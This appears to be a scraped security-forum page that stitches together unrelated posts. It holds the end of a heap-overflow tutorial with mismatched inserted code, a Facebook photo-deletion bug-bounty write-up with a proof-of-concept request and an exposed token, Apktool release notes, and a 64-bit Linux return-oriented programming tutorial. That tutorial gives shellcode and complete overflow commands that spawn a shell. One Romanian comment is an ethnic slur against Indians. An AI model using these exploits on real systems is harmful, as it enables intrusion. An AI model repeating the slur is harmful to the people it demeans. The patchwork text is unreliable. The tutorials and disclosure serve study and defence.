We will demonstrate overwriting Windows callback functions and overwriting FILE (__iob) structures (with popen()). Once you know how to overwrite FILE structures with popen(), you can quickly figure out how to do it with other functions (i.e., *printf, *gets, *scanf, etc.), as well as DIR structures (because they are similar).

Now for some case studies! Our two "real world" vulnerabilities will be Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability was discovered by mudge of L0pht (see the L0pht 1996 Advisory Page). We're reusing it because it's a textbook example of a heap-based overflow (though we will use our own method of exploitation).

Our first case study will be the BSDI crontab heap-based overflow. We can pass a long filename, which will overflow a static buffer. Above that buffer in memory, we have a pwd (see pwd.h) structure!
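Item 6 in the list is worth a concrete sketch: the data getenv() hands back lives in writable memory, so a program that checks a variable once and uses it later can be betrayed by anything that rewrites that storage in between. Here the standard setenv() stands in for the attacker's heap overwrite (the paths are illustrative):

```c
#include <stdlib.h>
#include <string.h>

/* Check-then-use on $HOME: returns 1 if the value observed at "use"
 * time differs from the one validated at "check" time. We play
 * attacker ourselves with setenv(); a heap overwrite of the
 * environment's backing store would have the same effect. */
int home_changed_after_check(void)
{
    setenv("HOME", "/home/alice", 1);

    char checked[64];
    strncpy(checked, getenv("HOME"), sizeof(checked) - 1);
    checked[sizeof(checked) - 1] = '\0';   /* the "check" */

    setenv("HOME", "/root", 1);            /* the overwrite */

    return strcmp(checked, getenv("HOME")) != 0;   /* the "use" */
}
```

Any privileged program that trusts a once-validated environment value falls to exactly this time-of-check/time-of-use gap.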
This stores a user's user name, password, uid, gid, etc. By overwriting the uid/gid fields of the pwd, we can modify the privileges that crond will run our crontab with (as soon as it tries to run our crontab). The crontab script could then drop a suid root shell, because it will be running with uid/gid 0. Here is our exploit code:
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
When we run it on a BSDI X.X machine, we get the following:

[Put exploit output here]

'tip' is run suid uucp on Solaris. It is possible to get root once uucp privileges are gained (but that's outside the scope of this article). Tip will overflow a static buffer when prompting for a file to send/receive. Above the static buffer in memory is a jmp_buf. By overwriting the static buffer and then causing a SIGINT, we can get shellcode executed (by storing it in argv[]). To exploit successfully, we need to either connect to a valid system, or create a "fake device" to which tip will connect. Here is our tip exploit:
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
When we run it on a Solaris 2.7 machine, we get the following:

[Put exploit output here]

Possible Fixes (Workarounds)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Obviously, the best prevention for heap-based overflows is writing good code! As with stack-based overflows, there is no sure way of preventing heap-based overflows.

We can get a copy of the bounds checking gcc/egcs (which should locate most potential heap-based overflows) developed by Richard Jones and Paul Kelly. This program can be downloaded from Richard Jones' homepage at http://www.annexia.demon.co.uk. It detects overruns that might be missed by human error. One example they use is: "int array[10]; for (i = 0; i <= 10; i++) array[i] = 1". I have never used it.
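The crontab bug reduces to one fact: bytes written past a static buffer land in the structure that happens to sit above it. A safe, self-contained model of the pwd overwrite (the struct layout and values are hypothetical, and a deliberate oversized memcpy stands in for the long filename):

```c
#include <string.h>
#include <stdint.h>

struct fake_pwd {          /* stand-in for the real struct passwd */
    char name[16];
    uint32_t uid;          /* sits directly above the buffer */
};

/* Fill the 16-byte name buffer, then keep writing: the 4 extra bytes
 * land in uid, just as crontab's long filename landed in the pwd
 * structure above its static buffer. Returns uid after the "overflow". */
uint32_t smash_uid(void)
{
    struct fake_pwd rec;
    memset(&rec, 0, sizeof rec);
    rec.uid = 1000;                      /* ordinary user */

    unsigned char evil[20];
    memset(evil, 'A', 16);               /* fills name[] exactly */
    memset(evil + 16, 0, 4);             /* spills into uid: 0 = root */
    memcpy(&rec, evil, sizeof evil);     /* the unchecked copy */

    return rec.uid;
}
```

The copy stays inside the struct here, so the demonstration is well-defined C; in the real crontab the same spill crossed from one object into the next.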
Note: For Windows, one could use NuMega's BoundsChecker, which essentially performs the same role as the bounds checking gcc.

We can always make a non-executable heap patch (as mentioned earlier, most systems have an executable heap). During a conversation I had with Solar Designer, he mentioned that the main problems with a non-executable heap would involve compilers, interpreters, etc.

Note: I added this note section to reiterate the point that a non-executable heap does NOT prevent heap overflows at all. It means we can't execute instructions in the heap. It does NOT prevent us from overwriting data in the heap.

Likewise, another possibility is to make a "HeapGuard", which would be the equivalent of Cowan's StackGuard mentioned earlier. He (et al.) also developed something called "MemGuard", but it's a misnomer. Its function is to prevent a return address (on the stack) from being overwritten (via canary values) on the stack. It does nothing to prevent overflows in the heap or bss.

Acknowledgements
~~~~~~~~~~~~~~~~
There has been a significant amount of work on heap-based overflows in the past. We ought to name some other people who have published work involving heap/bss-based overflows (though our work wasn't based on theirs).

Solar Designer: SuperProbe exploit (function pointers), color_xterm exploit (struct pointers), WebSite (pointer arrays), etc.

L0pht: Internet Explorer 4.01 vulnerability (dildog), BSDI crontab exploit (mudge), etc.

Some others who have published exploits for heap-based overflows (thanks to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam Morrison (stdioflow). I'm sure there are many others, and I apologize for excluding anyone.

I'd also like to thank the following people who had some direct involvement in this article: str (stranJer), halflife, and jobe. Indirect involvements: Solar Designer, mudge, and other w00w00 affiliates.
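The "HeapGuard" idea is easy enough to sketch: plant a known canary value just past the buffer and refuse to trust the object after any risky write that clobbered it. The constant and layout below are illustrative only; a real implementation (like StackGuard) randomizes the canary per run:

```c
#include <string.h>
#include <stdint.h>

#define CANARY 0xdeadc0deU     /* illustrative; should be random */

struct guarded {
    char buf[16];
    uint32_t canary;           /* planted just past the buffer */
};

void guarded_init(struct guarded *g)
{
    memset(g->buf, 0, sizeof g->buf);
    g->canary = CANARY;
}

/* Perform an unchecked copy into the buffer region, then verify the
 * canary: returns 1 if it survived, 0 if the write smashed it. */
int copy_and_check(struct guarded *g, const void *src, size_t n)
{
    memcpy(g, src, n);         /* unchecked write starting at buf */
    return g->canary == CANARY;
}
```

Like StackGuard, this detects the overflow after the fact; it does not stop the overwrite of anything that sits between the buffer and the canary.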
Other good sources of info include: as/gcc/ld info files (/usr/info/*), BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00 (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.

Epilogue:
Most people who claim their systems are "secure" are saying so out of a lack of knowledge ("ignorant" seemed a little too strong). Assuming security leads to a false sense of security (e.g., azrael.phrack.com has remote vulnerabilities involving heap-based overflows that have gone unnoticed for quite a while). Hopefully, people will experiment with heap-based overflows, and in turn will become more aware that the problems exist. We need to realize that the problems are out there, waiting to be fixed.

Thanks for reading! We hope you've enjoyed it! You can e-mail me at shok@dataforce.net, or mattc@repsec.com. See the w00w00 (www.w00w00.org) web site, also!

------------------------------------------------------------------------------
Matt Conover (a.k.a. Shok) & w00w00 Security Team

[ http://www.w00w00.org, w00w00 Security Development (WSD) ]
[ See the URL above for information on: what w00w00 is, our ]
[ security projects (all available online), some of our ]
[ articles, and more. Enjoy! ]

Source: http://www.cgsecurity.org/exploit/heaptut.txt
  17. Nytro

    Unban paxnwo

Pax has come a long way over the last few years (uiiu). Jokes aside, he's an okay guy. Even black_death has come a long way. My heart swelled when I heard him asking something about a "port" (the kind that goes up to 65535, not the one in Constanta) <3
  18. La cum arata ar fi bine sa fie Part 1 din 700. Nu a facut nimic indianu asta nespalat. Unde e analiza? Toti indienii sunt jegosi. Si prosti. Prosti de put.
Homepage: Exploit Pack - Security. It was presented at Black Hat 2014, if I remember right.
I think this one had been reported by us as well.
How I Hacked Your Facebook Photos

What if your photos got deleted without your knowledge? Obviously that's very upsetting, isn't it? Yup, this post is about a vulnerability I found which allowed a malicious user to delete any photo album on Facebook. Any photo album owned by a user, a page, or a group could be deleted.

The Graph API is the primary way for developers to read and write users' data. All current Facebook apps use the Graph API. In general, the Graph API requires an access token to read or write users' data. Read more about the Graph API here.

According to the Facebook developers documentation, photo albums cannot be deleted using the album node in the Graph API. I tried to delete one of my photo albums using a Graph Explorer access token.

Request:

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response:

{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn't have the capability to delete a photo album. But we need to note the error message: it tells us that some other application does have the capability to make this API call.

I decided to try it with a Facebook for mobile access token, because we can see a delete option for all photo albums in the Facebook mobile application, can't we? It uses the same Graph API, so I took an album ID and a Facebook for Android access token of mine and tried it.

Request:

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:

true

My album (518171421550249) got deleted. So what's the next step? I took a victim's album ID and tried to delete it.
I was very curious to see the result.

Request:

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:

true

OMG, the album got deleted! So I had access to delete all of your Facebook photos (the photos which are public, or the photos I could see). I immediately reported this bug to the Facebook security team. They were very fast in identifying the issue, and there was a fix in place less than 2 hours from the acknowledgement of the report.

Final Proof Of Concept:

Request:

DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you aren't sure about how to do it, please see this video.

First acknowledgement from the Facebook security team. They acknowledged the fix and rewarded me $12,500 USD for reporting this vulnerability. Now it's completely fixed. Thank you, Facebook Security Team, for running a bug bounty program and for quickly fixing this issue. Soon I'll get listed for the year 2015.

HALL OF FAME: https://www.facebook.com/whitehat/thanks

Posted by Laxman Muthiyah at 00:30

Source: http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html
Apktool 2.0.0 RC4 Released
February 12, 2015

Apktool 2.0.0 RC4 has been released. I was going to tag this version as 2.0 Gold, but RC3 introduced a completely rewritten aapt that caused a plethora of errors, so I've decided to hold another release candidate. This release contained 47 commits by 6 people, 27 of the commits belonging to the updated smali release.

Notable in this release is the fix for the implicitly added qualifiers that aapt introduced. These caused resource directories to change from drawable-hdpi to drawable-hdpi-v11, as an example. In theory this shouldn't have broken anything, but bug reports proved otherwise. Since Apktool isn't your "first" tool to build an APK, I determined it was best to just skip this step of adding qualifiers. 0xD34D from Cyanogen helped me figure that out.

Changes since RC3

Updated to smali/baksmali 2.0.5
[#685] - Fixed select invalid attrs from Lollipop APKs
[#713] - Added support for APKs that utilized Shared Resources
[#329] - Fixed issue identifying strings that were named like filepaths as ResFiles
[#590] - Fixed isolated issue with segfaulting apks
[#545] - Fixed issue with undefined attributes
[#702] - Fixed invalid treating of MNC_ZERO which caused duplicate resources
[#744] - Fixed ugly warnings of "Cleaning up unclosed ZipFile...."
[#757] - Fixed downloading gradle over http, instead of https
[#402] - Fixed issue with framework storage when user has no access to $HOME

Notes

There was no framework update in RC4, but if RC4 is your first version, please delete the file at $HOME/apktool/framework/1.apk before trying RC4.

Download

Apktool 2.0.0 RC4 - md5 672f12efc5ffee79f3670f36cd6bbb64
Rename to apktool.jar and follow the Instruction Guide if you need help.

Links

Github
Bug Tracker
XDA Thread

Source: http://connortumbleson.com/2015/02/12/apktool-2-0-0-rc4-released/
  23. 64-bit Linux Return-Oriented Programming Nobody’s perfect. Particularly not programmers. Some days, we spend half our time fixing mistakes we made in the other half. And that’s when we’re lucky: often, a subtle bug escapes unnoticed into the wild, and we only learn of it after a monumental catastrophe. Some disasters are accidental. For example, an unlucky chain of events might result in the precise conditions needed to trigger an overlooked logic error. Other disasters are deliberate. Like an accountant abusing a tax loophole lurking in a labyrinth of complex rules, an attacker might discover a bug, then exploit it to take over many computers. Accordingly, modern systems are replete with security features designed to prevent evildoers from exploiting bugs. These safeguards might, for instance, hide vital information, or halt execution of a program as soon as they detect anomalous behaviour. Executable space protection is one such defence. Unfortunately, it is an ineffective defence. In this guide, we show how to circumvent executable space protection on 64-bit Linux using a technique known as return-oriented programming. Some assembly required We begin our journey by writing assembly to launch a shell via the execve system call. For backwards compatibility, 32-bit Linux system calls are supported in 64-bit Linux, so we might think we can reuse shellcode targeted for 32-bit systems. However, the execve syscall takes a memory address holding the NUL-terminated name of the program that should be executed. Our shellcode might be injected someplace that requires us to refer to memory addresses larger than 32 bits. Thus we must use 64-bit system calls. The following may aid those accustomed to 32-bit assembly. 
                  32-bit syscall                64-bit syscall
  instruction     int $0x80                     syscall
  syscall number  EAX, e.g. execve = 0xb        RAX, e.g. execve = 0x3b
  up to 6 inputs  EBX, ECX, EDX, ESI, EDI, EBP  RDI, RSI, RDX, R10, R8, R9
  over 6 inputs   in RAM; EBX points to them    forbidden
  example         mov $0xb, %eax                mov $0x3b, %rax
                  lea string_addr, %ebx         lea string_addr, %rdi
                  mov $0, %ecx                  mov $0, %rsi
                  mov $0, %edx                  mov $0, %rdx
                  int $0x80                     syscall

We inline our assembly code in a C file, which we call shell.c:

int main() {
  asm("\
needle0: jmp there\n\
here:    pop %rdi\n\
         xor %rax, %rax\n\
         movb $0x3b, %al\n\
         xor %rsi, %rsi\n\
         xor %rdx, %rdx\n\
         syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
");
}

No matter where in memory our code winds up, the call-pop trick will load the RDI register with the address of the "/bin/sh" string. The needle0 and needle1 labels are to aid searches later on; so is the 0xdeadbeef constant (though since x86 is little-endian, it will show up as EF BE AD DE followed by 4 zero bytes).
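The 64-bit column of the table can be exercised directly from C: syscall number in RAX, arguments in RDI/RSI/RDX, then the syscall instruction (which clobbers RCX and R11). A sketch of a three-argument wrapper, assuming an x86-64 Linux host:

```c
/* Raw three-argument Linux x86-64 system call: nr goes in RAX,
 * arguments in RDI, RSI, RDX; the result comes back in RAX.
 * The kernel clobbers RCX and R11, so we tell the compiler. */
long syscall3(long nr, long a1, long a2, long a3)
{
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3)
                      : "rcx", "r11", "memory");
    return ret;
}
```

For example, `syscall3(39, 0, 0, 0)` invokes getpid (syscall number 39 on x86-64), and `syscall3(0x3b, ...)` would be the execve the shellcode issues.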
For simplicity, we’re using the API incorrectly; the second and third arguments to execve are supposed to point to NULL-terminated arrays of pointers to strings (argv[] and envp[]). However, our system is forgiving: running "/bin/sh" with NULL argv and envp succeeds:

ubuntu:~$ gcc shell.c
ubuntu:~$ ./a.out
$

In any case, adding argv and envp arrays is straightforward.

The shell game

We extract the payload we wish to inject. Let’s examine the machine code:

$ objdump -d a.out | sed -n '/needle0/,/needle1/p'
00000000004004bf <needle0>:
  4004bf: eb 0e                   jmp 4004cf <there>
00000000004004c1 <here>:
  4004c1: 5f                      pop %rdi
  4004c2: 48 31 c0                xor %rax,%rax
  4004c5: b0 3b                   mov $0x3b,%al
  4004c7: 48 31 f6                xor %rsi,%rsi
  4004ca: 48 31 d2                xor %rdx,%rdx
  4004cd: 0f 05                   syscall
00000000004004cf <there>:
  4004cf: e8 ed ff ff ff          callq 4004c1 <here>
  4004d4: 2f                      (bad)
  4004d5: 62                      (bad)
  4004d6: 69 6e 2f 73 68 00 ef    imul $0xef006873,0x2f(%rsi),%ebp
00000000004004dc <needle1>:

On 64-bit systems, the code segment is usually placed at 0x400000, so in the binary, our code starts at offset 0x4bf and finishes right before offset 0x4dc. This is 29 bytes:

$ echo $((0x4dc-0x4bf))
29

We round this up to the next multiple of 8 to get 32, then run:

$ xxd -s0x4bf -l32 -p a.out shellcode

Let’s take a look:

$ cat shellcode
eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
bead

Learn bad C in only 1 hour!

An awful C tutorial might contain an example like the following victim.c:

#include <stdio.h>

int main() {
  char name[64];
  puts("What's your name?");
  gets(name);
  printf("Hello, %s!\n", name);
  return 0;
}

Thanks to the cdecl calling convention for x86 systems, if we input a really long string, we’ll overflow the name buffer, and overwrite the return address. Enter the shellcode followed by the right bytes and the program will unwittingly run it when trying to return from the main function.

The Three Trials of Code Injection

Alas, stack smashing is much harder these days.
On my stock Ubuntu 12.04 install, there are 3 countermeasures: GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler rearranges the stack layout to make buffer overflows less dangerous and inserts runtime stack integrity checks. Executable space protection (NX): attempting to execute code in the stack causes a segmentation fault. This feature goes by many names, e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute (W^X) on BSD. We call it NX here, because 64-bit Linux implements this feature with the CPU’s NX bit ("Never eXecute"). Address Space Layout Randomization (ASLR): the location of the stack is randomized every run, so even if we can overwrite the return address, we have no idea what to put there. We’ll cheat to get around them. Firstly, we disable the SSP: $ gcc -fno-stack-protector -o victim victim.c Next, we disable executable space protection: $ execstack -s victim Lastly, we disable ASLR when running the binary: $ setarch `arch` -R ./victim What's your name? World Hello, World! One more cheat. We’ll simply print the buffer location: #include <stdio.h> int main() { char name[64]; printf("%p\n", name); // Print address of buffer. puts("What's your name?"); gets(name); printf("Hello, %s!\n", name); return 0; } Recompile and run it: $ setarch `arch` -R ./victim 0x7fffffffe090 What's your name? The same address should appear on subsequent runs. We need it in little-endian: $ a=`printf %016x 0x7fffffffe090 | tac -rs..` $ echo $a 90e0ffffff7f0000 Success! At last, we can attack our vulnerable program: $ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim The shellcode takes up the first 32 bytes of the buffer. The 80 zeroes in the printf represent 40 zero bytes, 32 of which fill the rest of the buffer, and the remaining 8 overwrite the saved location of the RBP register. The next 8 overwrite the return address, and point to the beginning of the buffer where our shellcode lies. 
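The `printf %016x ... | tac -rs..` trick above is just byte-swapping: the return address must appear in memory least-significant byte first on this little-endian machine. The same transformation in C:

```c
#include <stdint.h>
#include <stddef.h>

/* Serialize addr into out[0..7] least-significant byte first -- the
 * order the bytes must occupy on a little-endian x86-64 stack (the
 * C equivalent of `printf %016x ... | tac -rs..`). */
void put_le64(unsigned char out[8], uint64_t addr)
{
    for (size_t i = 0; i < 8; i++)
        out[i] = (unsigned char)(addr >> (8 * i));
}
```

Applied to the buffer address 0x7fffffffe090, this yields the byte sequence 90 e0 ff ff ff 7f 00 00, matching the `$a` string computed above.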
Hit Enter a few times, then type "ls" to confirm that we are indeed in a running shell. There is no prompt, because the standard input is provided by cat, and not the terminal (/dev/tty).

The Importance of Being Patched

Just for fun, we’ll take a detour and look into ASLR. In the old days, you could read the ESP register of any process by looking at /proc/pid/stat. This leak was plugged long ago. (Nowadays, a process can spy on a given process only if it has permission to ptrace() it.)

Let’s pretend we’re on an unpatched system, as it’s more satisfying to cheat less. Also, we see first-hand the importance of being patched, and why ASLR needs secrecy as well as randomness. Inspired by a presentation by Tavis Ormandy and Julien Tinnes, we run:

$ ps -eo cmd,esp

First, we run the victim program without ASLR:

$ setarch `arch` -R ./victim

and in another terminal:

$ ps -o cmd,esp -C victim
./victim ffffe038

Thus while the victim program is waiting for user input, its stack pointer is 0x7fffffe038. We calculate the distance from this pointer to the name buffer:

$ echo $((0x7fffffe090-0x7fffffe038))
88

We are now armed with the offset we need to defeat ASLR on older systems. After running the victim program with ASLR reenabled:

$ ./victim

we can find the relevant pointer by spying on the process, then adding the offset:

$ ps -o cmd,esp -C victim
./victim 43a4b538
$ printf %x\\n $((0x7fff43a4b538+88))
7fff43a4b590

Perhaps it’s easiest to demonstrate with named pipes:

$ mkfifo pip
$ cat pip | ./victim

In another terminal, we type:

$ sp=`ps --no-header -C victim -o esp`
$ a=`printf %016x $((0x7fff$sp+88)) | tac -r -s..`
$ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) > pip

and after hitting enter a few times, we can enter shell commands.

Executable space perversion

Recompile the victim program without running the execstack command. Alternatively, reactivate executable space protection by running:

$ execstack -c victim

Try attacking this binary as above.
Our efforts are thwarted as soon as the program jumps to our injected shellcode in the stack. The whole area is marked nonexecutable, so we get shut down.

Return-oriented programming deftly sidesteps this defence. The classic buffer overflow exploit fills the buffer with code we want to run; return-oriented programming instead fills the buffer with addresses of snippets of code we want to run, turning the stack pointer into a sort of indirect instruction pointer. The snippets of code are handpicked from executable memory: for example, they might be fragments of libc. Hence the NX bit is powerless to stop us.

In more detail:

 1. We start with SP pointing to the start of a series of addresses.
 2. A RET instruction kicks things off. Forget RET’s usual meaning of returning from a subroutine. Instead, focus on its effects: RET jumps to the address in the memory location held by SP, and increments SP by 8 (on a 64-bit system).
 3. After executing a few instructions, we encounter a RET. See step 2.

In return-oriented programming, a sequence of instructions ending in RET is called a gadget.

Go go gadgets

Our mission is to call the libc system() function with "/bin/sh" as the argument. We can do this by calling a gadget that assigns a chosen value to RDI and then jumping to the system() libc function.

First, where’s libc?

$ locate libc.so
/lib/i386-linux-gnu/libc.so.6
/lib/x86_64-linux-gnu/libc.so.6
/lib32/libc.so.6
/usr/lib/x86_64-linux-gnu/libc.so

My system has a 32-bit and a 64-bit libc. We want the 64-bit one; that’s the second on the list.

Next, what kind of gadgets are available anyway?

$ objdump -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B5 ret

The selection is reasonable, but our quick-and-dirty search only finds intentional snippets of code. We can do better.

In our case, we would very much like to execute:

pop %rdi
retq

while the pointer to "/bin/sh" is at the top of the stack. This would assign the pointer to RDI before advancing the stack pointer.
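The RET-as-dispatcher loop in the steps above can be modeled in plain C: treat the fake stack as an array of "gadget" addresses (ordinary function pointers here) and let each simulated RET pop the next one and transfer control to it. A toy model only, not real gadget execution:

```c
#include <stddef.h>

typedef long (*gadget)(long);

static long add_one(long v) { return v + 1; }   /* a tiny "gadget" */
static long doubled(long v) { return v * 2; }   /* another */

/* Walk the fake stack: each loop iteration models one RET --
 * fetch the address SP points at, bump SP, jump there. */
long run_chain(const gadget *fake_stack, size_t n, long v)
{
    for (size_t sp = 0; sp < n; sp++)
        v = fake_stack[sp](v);
    return v;
}
```

The real attack is exactly this loop executed by the CPU itself, with the "function pointers" being addresses of RET-terminated fragments inside libc.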
The corresponding machine code is the two-byte sequence 0x5f 0xc3, which ought to occur somewhere in libc. Sadly, I know of no widespread Linux tool that searches a file for a given sequence of bytes; most tools seem oriented towards text files and expect their inputs to be organized with newlines. (I’m reminded of Rob Pike’s "Structural Regular Expressions".) We settle for an ugly workaround: $ xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$1-1}' 22a12 In other words: Dump the library, one hex code per line. Look for "c3", and print one line of leading context along with the matches. We also print the line numbers. Look for the first "5f" match within the results. As line numbers start from 1 and offsets start from 0, we must subtract 1 to get the latter from the former. Also, we want the address in hexadecimal. Asking Awk to treat the first argument as a number (due to the subtraction) conveniently drops all the characters after the digits, namely the "-5f" that grep outputs. We’re almost there. If we overwrite the return address with the following sequence: libc’s address + 0x22a12 address of "/bin/sh" address of libc’s system() function then on executing the next RET instruction, the program will pop the address of "/bin/sh" into RDI thanks to the first gadget, then jump to the system function. Many happy returns In one terminal, run: $ setarch `arch` -R ./victim And in another: $ pid=`ps -C victim -o pid --no-headers | tr -d ' '` $ grep libc /proc/$pid/maps 7ffff7a1d000-7ffff7bd0000 r-xp 00000000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7bd0000-7ffff7dcf000 ---p 001b3000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7dcf000-7ffff7dd3000 r--p 001b2000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7dd3000-7ffff7dd5000 rw-p 001b6000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so Thus libc is loaded into memory starting at 0x7ffff7a1d000. 
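The xxd/grep/awk contortion above compensates for the lack of a byte-search tool; in C, scanning a code blob for the `pop %rdi; ret` byte pair is a few lines:

```c
#include <stddef.h>

/* Scan a code blob for the byte pair 0x5f 0xc3 ("pop %rdi; ret")
 * and return the offset of the first occurrence, or -1 if absent --
 * the unintentional gadgets the text mentions are found the same
 * way, by ignoring instruction boundaries entirely. */
long find_pop_rdi_ret(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (code[i] == 0x5f && code[i + 1] == 0xc3)
            return (long)i;
    return -1;
}
```

Run over the bytes of libc (e.g. read from the file found with locate), this reports the same 0x22a12-style offset the shell pipeline produced.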
That gives us our first ingredient: the address of the gadget is 0x7ffff7a1d000 + 0x22a12. Next we want "/bin/sh" somewhere in memory. We can proceed similarly to before and place this string at the beginning of the buffer. From before, its address is 0x7fffffffe090. The final ingredient is the location of the system library function. $ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep '\<system\>' 0000000000044320 W system Gotcha! The system function lives at 0x7ffff7a1d000 + 0x44320. Putting it all together: $ (echo -n /bin/sh | xxd -p; printf %0130d 0; printf %016x $((0x7ffff7a1d000+0x22a12)) | tac -rs..; printf %016x 0x7fffffffe090 | tac -rs..; printf %016x $((0x7ffff7a1d000+0x44320)) | tac -rs..) | xxd -r -p | setarch `arch` -R ./victim Hit enter a few times, then type in some commands to confirm this indeed spawns a shell. There are 130 0s this time, which xxd turns into 65 zero bytes. This is exactly enough to cover the rest of the buffer after "/bin/sh" as well as the pushed RBP register, so that the very next location we overwrite is the top of the stack. Debriefing In our brief adventure, ProPolice is the best defence. It tries to move arrays to the highest parts of the stack, so less can be achieved by overflowing them. Additionally, it places certain values at the ends of arrays, which are known as canaries. It inserts checks before return instructions that halts execution if the canaries are harmed. We had to disable ProPolice completely to get started. ASLR also defends against our attack provided there is sufficient entropy, and the randomness is kept secret. This is in fact rather tricky. We saw how older systems leaked information via /proc. In general, attackers have devised many ingenious methods to learn addresses that are meant to be hidden. Last, and least, we have executable space protection. It turned out to be toothless. So what if we can’t run code in the stack? We’ll simply point to code elsewhere and run that instead! 
We used libc, but in general, there is usually some corpus of code we can raid. For example, researchers compromised a voting machine with extensive executable space protection, turning its own code against it. Funnily enough, the cost of each measure seems inversely proportional to its benefit: Executable space protection requires special hardware (the NX bit) or expensive software emulation. ASLR requires cooperation from many parties. Programs and libraries alike must be loaded in random addresses. Information leaks must be plugged. ProPolice requires a compiler patch. Security theater One may ask: if executable space protection is so easily circumvented, is it worth having? Somebody must have thought so, because it is so prevalent now. Perhaps it’s time to ask: is executable space protection worth removing? Is executable space protection better than nothing? We just saw how trivial it is to stitch together shreds of existing code to do our dirty work. We barely scratched the surface: with just a few gadgets, any computation is possible. Furthermore, there are tools that mine libraries for gadgets, and compilers that convert an input language into a series of addresses, ready for use on an unsuspecting non-executable stack. A well-armed attacker may as well forget executable space protection even exists. Therefore, I argue executable space protection is worse than nothing. Aside from being high-cost and low-benefit, it segregates code from data. As Rob Pike puts it: This flies in the face of the theories of Turing and von Neumann, which define the basic principles of the stored-program computer. Code and data are the same, or at least they can be. But worse still are its implications for programmers. Executable space protection interferes with self-modifying code, which is invaluable for just-in-time compiling, and for miraculously breathing new life into ancient calling conventions set in stone. 
In a paper describing how to add nested functions to C despite its simple calling convention and thin pointers, Thomas Breuel observes:

There are, however, some architectures and/or operating systems that forbid a program to generate and execute code at runtime. We consider this restriction arbitrary and consider it poor hardware or software design. Implementations of programming languages such as FORTH, Lisp, or Smalltalk can benefit significantly from the ability to generate or modify code quickly at runtime.

Epilogue

Many thanks to Hovav Shacham, who first brought return-oriented programming to my attention. He co-authored a comprehensive introduction to return-oriented programming. Also, see the technical details of how return-oriented programming usurped a voting machine.

We focused on a specific attack. The defences we ran into can be much less effective against other kinds of attacks. For example, ASLR has a hard time fending off heap spraying.

Return-to-libc

Return-oriented programming is a generalization of the return-to-libc attack, which calls library functions instead of gadgets. In 32-bit Linux, the C calling convention is helpful, since arguments are passed on the stack: all we need to do is rig the stack so it holds our arguments and the address of the library function. When RET is executed, we're in business.

However, the 64-bit C calling convention is identical to that of 64-bit system calls, except RCX takes the place of R10, and more than 6 arguments may be present (any extras are placed on the stack in right-to-left order). Overflowing the buffer only allows us to control the contents of the stack, not the registers, complicating return-to-libc attacks. The new calling convention still plays nicely with return-oriented programming, because gadgets can manipulate registers.

GDB

Just as builders remove the scaffolding after finishing a skyscraper, I omitted the GDB sessions which helped me along the way.
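To make the 32-bit case concrete, here is a hedged sketch of the stack a classic return-to-libc overflow would build. The addresses and padding length are hypothetical placeholders, not values from the article:

```python
import struct

def p32(x):
    # Pack a 32-bit little-endian address.
    return struct.pack("<I", x)

SYSTEM_ADDR = 0xf7e42850  # hypothetical address of system() in a 32-bit libc
BINSH_ADDR  = 0xffffd0c0  # hypothetical address of a "/bin/sh" string
PADDING     = b"A" * 76   # hypothetical distance to the saved return address

payload  = PADDING
payload += p32(SYSTEM_ADDR)  # overwritten return address: RET jumps to system()
payload += p32(0x41414141)   # system()'s own return address (junk; crash later)
payload += p32(BINSH_ADDR)   # first argument, read from the stack per cdecl
```

In 64 bits this layout no longer works: system() would look for its argument in RDI, which the overflow cannot touch directly; hence the pop rdi gadget from earlier.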
Did you think I could get these exploits byte-perfect the first time? I wish! Speaking of which, I'm almost certain I've never used a debugger to debug! I've only used them to program in assembly, to investigate binaries for which I lacked the source, and now, for buffer overflow exploits.

A quote from Linus Torvalds comes to mind:

I don't like debuggers. Never have, probably never will. I use gdb all the time, but I tend to use it not as a debugger, but as a disassembler on steroids that you can program.

as does another from Brian Kernighan:

The most effective debugging tool is still careful thought, coupled with judiciously placed print statements.

I'm unsure if I'll ever write about GDB, since so many guides already exist. For now, I'll list a few choice commands:

$ gdb victim
start < shellcode
disas
break *0x00000000004005c1
cont
p $rsp
ni
